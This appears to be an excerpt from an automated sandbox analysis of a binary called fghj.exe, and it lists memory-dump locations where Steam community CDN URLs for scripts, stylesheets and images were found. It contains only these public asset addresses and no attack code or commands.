              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLW
              Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
              Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
              Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.j
              Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04ot
              Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
              Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
              Source: fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=VsdTzPa1YF_Y&l=e
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/sh
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.
              Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
